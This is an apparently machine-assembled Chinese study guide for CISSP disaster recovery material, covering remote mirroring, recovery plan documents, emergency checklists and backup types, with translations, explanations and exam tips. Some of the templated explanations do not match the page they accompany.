这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Remote mirroring is the most advanced database backup solution. Not surprisingly, it's also the most expensive! Remote mirroring goes beyond the technology used by remote journaling and electronic vaulting; with remote mirroring, a live database server is maintained at the backup site. The remote server receives copies of the database modifications at the same time they are applied to the production server at the primary site. Therefore, the mirrored server is ready to take over an operational role at a moment's notice. Remote mirroring is a popular database backup strategy for organizations seeking to implement a hot site.

However, when weighing the feasibility of a remote mirroring solution, be sure to take into account the infrastructure and personnel costs required to support the mirrored server, as well as the processing overhead that will be added to each database transaction on the mirrored server. Cloud-based database platforms may include redundancy capabilities as a built-in feature. If you operate databases in the cloud, consider investigating these options to simplify your disaster recovery planning efforts, but be sure to understand the limitations of the specific service you consider!

Recovery Plan Development Once you've established your business unit priorities and have a good idea of the appropriate alternative recovery sites for your organization, it's time to put pen to paper and begin drafting a true disaster recovery plan. Don't expect to sit down and write the full plan in one sitting. It's likely that the DRP team will go through many draft documents before reaching a final written document that satisfies the operational needs of critical business units and falls within the resource, time, and expense constraints of the disaster recovery budget and available personnel.

In the following sections, we explore some important items to include in your disaster recovery plan. Depending on the size of your organization and the number of people involved in the DRP effort, it may be a good idea to maintain multiple types of plan documents, intended for different audiences. The following list includes various types of documents worth considering:

中文直译 / 整理

远程镜像是最先进的数据库备份解决方案。 不出所料,它也是最昂贵的! 远程 镜像超越了远程日志记录和电子归档所使用的技术; 在远程镜像中,备份站点 会维护一个活动数据库服务器。 远程服务器在主站点的生产服务器应用数据库 修改的同时接收这些修改的副本。 因此,镜像服务器可以随时接管运行角色。 远程镜像是组织实施热站点时常用的一种数据库备份策略。 然而,在评估远程 镜像解决方案的可行性时,请务必考虑支持镜像服务器所需的基础设施和人员 成本,以及为镜像服务器上的每个数据库事务增加的处理开销。 基于云的数据库平台可能将冗余功能作为内置特性。 如果您在云中运 行数据库,请考虑调查这些选项以简化灾难恢复规划工作,但务必了解您 所考虑的特定服务的局限性! 恢复计划制定 一旦您确定了业务单元的优先级,并对组织的合适备用恢复站点有了清晰的认 识,就该动笔起草一份真正的灾难恢复计划了。 不要期望一次性坐下来就完成 整个计划的撰写。 DRP团队很可能需要经过多次草案修改,才能最终形成一份 满足关键业务单元运营需求、并符合灾难恢复预算和可用人员资源与时间限制 的正式文档。 在以下章节中,我们将探讨在您的灾难恢复计划中应包含的一些重要事项。

根 据您组织的规模以及参与灾难恢复计划工作的人员数量,维护多种面向不同受 众的计划文档可能是一个不错的选择。 以下列表包含了值得考虑的各种文档类 型:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1255 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 40 / PDF P1256

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Executive summary providing a high-level overview of the plan Department-specific plans Technical guides for IT personnel responsible for implementing and maintaining critical backup systems Checklists for individuals on the disaster recovery team Full copies of the plan for critical disaster recovery team members Using custom-tailored documents becomes especially important when a disaster occurs or is imminent. Personnel who need to refresh themselves on the disaster recovery procedures that affect various parts of the organization will be able to refer to their department-specific plans.

Critical disaster recovery team members will have checklists to help guide their actions amid the chaotic atmosphere of a disaster. IT personnel will have technical guides helping them get the alternate sites up and running. Finally, managers and public relations personnel will have a simple document that walks them through a high-level view of the coordinated symphony that is an active disaster recovery effort without requiring interpretation from team members busy with tasks directly related to that effort.

Visit the Professional Practices library at http://drii.org/resources/professionalpractices/EN to examine a collection of documents that explain how to work through and document your planning processes for BCP and disaster recovery. Other good standard documents in this area include the BCI Good Practice Guidelines (GPG) (www.thebci.org/resource/good-practiceguidelines--gpg--edition-7-0.html), ISO 27001:2022 (www.iso.org/standard/27001), and NIST SP 800-34—Contingency Planning Guide for Federal Information Systems (www.nist.gov/privacy-framework/nist-sp-800-34).

Emergency Response A disaster recovery plan should contain simple yet comprehensive instructions for essential personnel to follow immediately upon recognizing that a disaster is in progress or is imminent. These instructions will vary

中文直译 / 整理

提供计划高层概述的执行摘要 部门特定计划 面向负责实施和维护关键备份系统的IT人员的技术指南 灾难恢复团队成员的检查清单 提供给关键灾难恢复团队成员的完整计划副本 当灾难发生或即将发生时,使用定制文档变得尤为重要。 需要了解影响组织各 个部分的灾难恢复程序的人员可以参考其部门特定计划。 关键灾难恢复团队成 员将拥有检查清单,以帮助他们在灾难的混乱环境中指导行动。 IT人员将拥有 技术指南,帮助他们快速启动备用站点。 最后,管理人员和公共关系人员将拥 有一份简洁文档,引导他们了解灾难恢复工作的整体协调流程,而无需依赖正 在处理直接相关任务的团队成员进行解释。 访问专业实践库: http://drii.org/resources/professionalpractices/EN 以查阅一组文件,这些文 件说明了如何进行并记录您的业务连续性计划(BCP)和灾难恢复的规划过程。

本 领域其他优秀的标准文件包括BCI良好实践指南(GPG) (www.thebci.org/resource/good-practice-guidelines--gpg--edition-7-0.html)、 ISO 27001:2022 (www.iso.org/standard/27001) 和 NIST SP 800-34— Contingency 联邦信息系统规划指南(www.nist.gov/privacy-framework/nist-sp-800-34) 应急响应 灾难恢复计划应包含简洁而全面的说明,供关键人员在意识到灾难正在进行 或即将发生时立即遵循。 这些说明将因

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 41 / PDF P1257

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

widely depending on the nature of the disaster, the type of personnel responding to the incident, and the time available before facilities need to be evacuated and/or equipment shut down. For example, instructions for a large-scale fire will be much more concise than the instructions for how to prepare for a hurricane that is still 48 hours away from a predicted landfall near an operational site. Emergency-response plans are often put together in the form of checklists provided to responders. When designing such checklists, keep one essential design principle in mind: arrange the checklist tasks in order of priority, with the most important task first.

It's essential to remember that these checklists will be executed in the midst of a crisis. It is extremely likely that responders will not be able to complete the entire checklist, especially in the event of a short-notice disaster. For this reason, you should put the most essential tasks first on the checklist. The lower an item on the list, the lower the likelihood that it will be completed before an evacuation/shutdown takes place. Among these essential tasks is the formal declaration of a disaster.

The response plan should include clear criteria for activation of the disaster recovery plan, define who has the authority to declare a disaster, and then discuss notification procedures, as discussed in the next section. Personnel and Communications A disaster recovery plan should also contain a list of personnel to contact in the event of a disaster. Usually, this includes key members of the DRP team as well as personnel who execute critical disaster recovery tasks throughout the organization.

This response checklist should include alternate means of contact (e.g., pager numbers, mobile numbers) as well as backup contacts for each role should the primary contact be incommunicado or unable to reach the recovery site for one reason or another.

中文直译 / 整理

灾难的性质、响应人员的类型以及在设施需要疏散和/或设备关闭前可用的时 间而有很大差异。 例如,针对大规模火灾的说明将比针对距离预测登陆点仅剩 48小时的飓风的准备说明简洁得多。 应急响应计划通常以提供给响应人员的清 单形式制定。 在设计此类清单时,请牢记一个基本设计原则:按优先级顺序排 列清单任务,将最重要的任务放在首位。 必须记住,这些检查清单将在危机期间执行。 responders 极有可能无法完成 整个检查清单,尤其是在突发灾难的情况下。 因此,您应将最重要的任务优先 列在检查清单的前面。 清单中越靠下的项目,被在疏散/关闭前完成的可能性就 越低。 这些重要任务中包括正式宣布灾难。 响应计划应包含明确的灾难恢复计划 启动标准,定义谁有权限宣布灾难,然后讨论通知程序,如下一节所述。 人员与通信 灾难恢复计划还应包含一份灾难发生时需要联系的人员名单。 通常,这包括 DRP团队的关键成员以及组织内执行关键灾难恢复任务的人员。 此响应清单应 包含替代联系方式(例如寻呼机号码、手机号码),以及每个角色的备用联系 人,以防主要联系人无法联络或因任何原因无法到达恢复现场。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

检测是 IDS,主动阻断更像 IPS。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 42 / PDF P1258

第 1258 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The Power of Checklists Checklists are invaluable tools in the face of disaster. They provide a sense of order amid the chaotic events surrounding a disaster. Do what you must to ensure that response checklists provide first responders with a clear plan to protect life and property and ensure the continuity of operations. A checklist for response to a building fire might include the following steps: 1. Activate the building alarm system. 2. Ensure that an orderly evacuation is in progress. 3. If reasonable to do so, consider fighting the fire with available fire extinguishers or other fire suppression equipment. 4.

After leaving the building, use a mobile telephone to call emergency services (911 in the United States) to ensure that emergency authorities received the alarm notification. Provide additional information on any required emergency response. 5. Ensure that any injured personnel receive appropriate medical treatment. 6. Activate the organization's disaster recovery plan to ensure continuity of operations. Assessment When the disaster recovery team arrives on-site, one of their first tasks is to assess the situation. This normally occurs in a rolling fashion, with the first responders performing a simple assessment to triage activity and get the disaster response under way.

As the incident progresses, more detailed assessments will take place to gauge the effectiveness of disaster recovery efforts and prioritize the assignment of resources. Backups and Storage Strategies Backups play an important role in the disaster recovery plan. They are copies of data stored on tape, disk, the cloud, or other media as a last-ditch recovery

中文直译 / 整理

清单的力量 在灾难面前,清单是无价的工具。 它们能在灾难周围的混乱事件中提供秩 序感。 务必采取一切必要措施,确保响应清单为应急人员提供明确的计划, 以保护生命和财产,并确保业务连续性。 建筑物火灾应对清单可能包括以下步骤: 1. 启动建筑物警报系统。 2. 确保有序疏散正在进行。 3. 如果合理可行,考虑使用可用的灭火器或其他灭火设备扑灭火灾。 4. 离开建筑物后,使用移动电话拨打紧急服务电话(美国为911),以 确保紧急管理部门已收到警报通知,并提供任何所需的紧急响应的额外 信息。 5. 确保所有受伤人员获得适当的医疗救治。 6. 启动组织的灾难恢复计划,以确保业务连续性。 评估 当灾难恢复团队抵达现场时,他们的首要任务之一是评估情况。 这通常以滚 动方式进行,首批响应人员会进行初步评估,以分类活动并启动灾难应对工 作。 随着事件的发展,将进行更详细的评估,以衡量灾难恢复工作的有效性, 并优先分配资源。 备份与存储策略 备份在灾难恢复计划中起着重要作用。 它们是存储在磁带、磁盘、云或其他介质上 的数据副本,作为最后的恢复手段

小白解释

场景先行:你是公司的安全负责人,正在读第 1258 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1258 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 43 / PDF P1259

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

option. If a natural or human-made disaster causes data loss, administrators may turn to backups to recover lost data. Your disaster recovery plan (especially the technical guide) should fully address the backup strategy pursued by your organization. Indeed, this is one of the most important elements of any business continuity plan and disaster recovery plan. Many system administrators are already familiar with various types of backups, so you'll benefit by bringing one or more individuals with specific technical expertise in this area onto the BCP/DRP team to provide expert guidance.

There are three main types of backups: Full Backups As the name implies, full backups store a complete copy of the data contained on the protected device. Full backups duplicate every file on the system regardless of the setting of the archive bit. Once a full backup is complete, the archive bit on every file is reset, turned off, or set to 0. Incremental Backups Incremental backups store only those files that have been modified since the time of the most recent full or incremental backup. Only files that have the archive bit turned on, enabled, or set to 1 are duplicated. Once an incremental backup is complete, the archive bit on all duplicated files is reset, turned off, or set to 0.

Differential Backups Differential backups store all files that have been modified since the time of the most recent full backup. Only files that have the archive bit turned on, enabled, or set to 1 are duplicated. However, unlike full and incremental backups, the differential backup process does not change the archive bit. Some operating systems do not actually use an archive bit to achieve this goal and instead analyze file system timestamps. This difference in implementation doesn't affect the types of data stored by each backup type. The most important difference between incremental and differential backups is the time needed to restore data in the event of an emergency.

If you use a combination of full and differential backups, you will need to restore only two backups—the most recent full backup and the most recent differential backup. On the other hand, if your strategy combines full backups with

中文直译 / 整理

选项。 如果自然灾害或人为灾难导致数据丢失,管理员可以依靠备份来恢复丢失 的数据。 您的灾难恢复计划(特别是技术指南)应全面涵盖贵组织所采用的备份策略。 事实上,这是任何业务连续性计划和灾难恢复计划中最重要的要素之一。 许多系统管理员已经熟悉各种类型的备份,因此您可以通过让一名或多名在 该领域具有特定技术专长的人员加入BCP/DRP团队,以获得专业指导。 备 份主要有三种类型: 完整备份 如其名称所示,完整备份 会存储受保护设备上包含的所有数据的完整 副本。 完整备份会复制系统上的每个文件,无论存档位的设置如何。 一旦完整 备份完成,每个文件的存档位都会被重置、关闭或设置为0。 增量备份 增量备份 仅存储自上次完整备份或增量备份以来已修改的文件。 只 有存档位被开启、启用或设置为1的文件才会被复制。 一旦增量备份完成,所 有被复制文件的存档位都会被重置、关闭或设置为0。 差异备份 差异备份 存储自最近一次完整备份以来所有已修改的文件。 仅复制归 档位被启用、开启或设置为 1 的文件。 然而,与完整备份和增量备份不同,差异 备份过程不会更改归档位。 某些操作系统实际上并未使用归档位来实现此目标,而是分析文件系 统的时间戳。

这种实现上的差异不会影响每种备份类型所存储的数据类型。 增量备份和差异备份之间最重要的区别在于发生紧急情况时恢复数据所需的时 间。 如果您使用完整备份和差异备份的组合,您只需恢复两个备份——最新的完 整备份和最新的差异备份。 另一方面,如果您的策略结合了完整备份和

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 44 / PDF P1260

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

incremental backups, you will need to restore the most recent full backup as well as all incremental backups performed since that full backup. The tradeoff is the time required to create the backups—differential backups don't take as long to restore, but they take longer to create than incremental ones. The storage of the backup media is equally critical. It may be convenient to store backup media in or near the primary operations center to easily fulfill user requests for backup data, but you'll definitely need to keep copies of the media in at least one off-site location to provide redundancy should your primary operating location be suddenly destroyed.

One common strategy used by many organizations is to store backups in a cloud service that is itself geographically redundant. This allows the organization to retrieve the backups from any location after a disaster. Note that using geographically diverse sites may introduce new regulatory requirements when the information resides in different jurisdictions. Using Backups In case of system failure, many companies use one of two common methods to restore data from backups. In the first situation, they run a full backup on Monday night and then run differential backups every other night of the week.

If a failure occurs Saturday morning, they restore Monday's full backup and then restore only Friday's differential backup. In the second situation, they run a full backup on Monday night and run incremental backups every other night of the week. If a failure occurs Saturday morning, they restore Monday's full backup and then restore each incremental backup in original chronological order. Most organizations adopt a backup strategy that utilizes more than one of the three backup types along with a media rotation scheme.

Both allow backup administrators access to a sufficiently large range of backups to complete user requests and provide fault tolerance while minimizing the amount of money that must be spent on backup media. A common strategy is to perform full backups over the weekend and incremental or differential backups on a nightly basis. The specific method of backup and all of the particulars of the backup procedure are dependent on your organization's fault-tolerance requirements, as defined by your RPO values. If you are unable to survive minor amounts of data loss, your ability to tolerate faults is low. However, if

中文直译 / 整理

增量备份,您需要恢复最新的完整备份以及自该完整备份以来执行的所有增量 备份。 权衡之处在于创建备份所需的时间——差异备份恢复起来更快,但创建 时间比增量备份更长。 备份介质的存储同样至关重要。 将备份介质存放在主运营中心内部或附近,可 以方便地满足用户对备份数据的请求,但您必须至少在一处异地位置保留介质 副本,以便在主运营地点突然被毁时提供冗余。 许多组织常用的一种策略是将 备份存储在本身具有地理冗余的云服务中。 这使得组织在灾难发生后,能够从 任何地点检索备份。 请注意,使用地理位置分散的站点可能会引入新的监管要 求,因为信息存储在不同司法管辖区时会涉及合规问题。 使用备份 在系统故障的情况下,许多公司通常采用两种方法之一从备份中恢复数据。 第一种情况是:周一夜间执行完整备份,然后在每周其他夜晚执行差异备 份。 如果周六早上发生故障,则恢复周一的完整备份,再仅恢复周五的差 异备份。 第二种情况是:周一夜间执行完整备份,然后在每周其他夜晚执 行增量备份。 如果周六早上发生故障,则恢复周一的完整备份,再按原始 时间顺序依次恢复每个增量备份。 大多数组织采用一种备份策略,结合使用三种备份类型中的多种,并配合介质 轮换方案。

这两种方式都使备份管理员能够访问足够广泛的备份,以满足用户 请求并提供容错能力,同时最小化在备份介质上的支出。 一种常见的策略是在 周末执行完整备份,而在每晚执行增量或差异备份。 具体的备份方法和备份程 序的所有细节取决于您组织的容错要求,这些要求由您的RPO值定义。 如果您 无法承受少量数据丢失,那么您的容错能力就较低。 然而,如果

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 45 / PDF P1261

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

hours or days of data can be lost without serious consequence, your tolerance of faults is high. You should design your backup solution accordingly. The Oft-Neglected Backup Backups are probably the least practiced and most neglected preventive measure known to protect against computing disasters. A comprehensive backup of all operating system and personal data on workstations happens less frequently than for servers or mission-critical machines, but they all serve an equal and necessary purpose. Damon, an information professional, learned this the hard way when he lost months of work following a natural disaster that wiped out the first floor at an information brokering firm.

He never used the backup facilities built into his operating system or any of the shared provisions established by his administrator, Carol. Carol has been there and done that, so she knows a thing or two about backup solutions. She has established incremental backups on her production servers and differential backups on her development servers, and she's never had an issue restoring lost data. The toughest obstacle to a solid backup strategy is human nature, so a simple, transparent, and comprehensive strategy is the most practical.

Differential backups require only two container files (the latest full backup and the latest differential) and can be scheduled for periodic updates at some specified interval. That's why Carol elects to implement this approach and feels ready to restore from her backups any time she's called on to do so. Disk-to-Disk Backup Over the past decade, disk storage has become increasingly inexpensive. With drive capacities now measured in terabytes, tape and optical media can't cope with data volume requirements anymore. Many enterprises now use disk-todisk (D2D) backup solutions for some portion of their disaster recovery strategy.

中文直译 / 整理

丢失数小时或数天的数据不会造成严重后果,则您的容错能力较高。 您应据此设计 您的备份解决方案。 常被忽视的备份 备份可能是最不常实践、最被忽视的预防措施,用于防范计算灾难。 工作 站上所有操作系统和个人数据的完整备份,其执行频率低于服务器或关键 任务机器,但它们的作用同等重要且必不可少。 信息专业人士达蒙在一场自然灾害摧毁了一家信息中介公司一楼后,失去 了数月的工作成果,才深刻体会到这一点。 他从未使用过操作系统内置的 备份功能,也从未使用过管理员卡罗尔设置的任何共享备份方案。 卡罗尔曾亲身经历过这些,因此对备份解决方案颇有心得。 她在生产服务 器上设置了增量备份,在开发服务器上设置了差异备份,从未遇到过无法 恢复丢失数据的问题。 实施稳健备份策略最难克服的障碍是人性,因此简单、透明且全面的策略 最为实用。 差异备份仅需两个容器文件(最新的完整备份和最新的差异备 份),并可按指定间隔定期更新。 这就是卡罗尔选择采用这种方法的原因, 她随时都准备好在需要时从备份中恢复数据。 磁盘到磁盘备份 在过去十年中,磁盘存储变得越来越便宜。 随着驱动器容量现在以太字节为单 位,磁带和光盘介质已无法满足数据量需求。

许多企业现在将磁盘到磁盘( D2D)备份解决方案用于其灾难恢复策略的一部分。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 46 / PDF P1262

第 1262 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Many backup technologies are designed around the tape paradigm. Virtual tape libraries (VTLs) support the use of disks with this model by using software to make disk storage appear as tapes to backup software. One important note: organizations seeking to adopt an entirely disk-to-disk approach must remember to maintain geographical diversity. Some of those disks have to be located off-site. Many organizations solve this problem by hiring managed service providers to manage remote backup locations. Cloud Storage Cloud storage provides a flexible and scalable solution for backups, offering remote, geographically diverse data storage.

It mitigates the risk of data loss due to local disasters by enabling data retrieval from any location. Cloud backups often incorporate redundancy and can be more cost-effective, eliminating the need for physical storage management. Regulatory considerations apply when storing data across jurisdictions, making compliance an integral part of cloud storage strategy in disaster recovery planning. Backup Best Practices No matter what the backup solution, media, or method, you must address several common issues with backups. For instance, backup and restoration activities can be bulky and slow.

Such data movement can significantly affect the performance of a network, especially during regular production hours. Thus, backups should be scheduled during the low peak periods (for example, at night). The amount of backup data increases over time. This causes the backup (and restoration) processes to take longer each time you perform a backup. Each backup also consumes more space on the backup media. Thus, you need to build sufficient capacity to handle a reasonable amount of growth over a reasonable amount of time into your backup solution. What is reasonable all depends on your environment and budget.

With periodic backups (that is, backups that are run every 24 hours), there is always the potential for data loss up to the length of the period. Murphy's law dictates that a server never crashes immediately after a successful backup. Instead, it is always just before the next backup begins. To avoid the problem with periods, you may deploy some form of real-time continuous backup, such as RAID, clustering, or server mirroring.

中文直译 / 整理

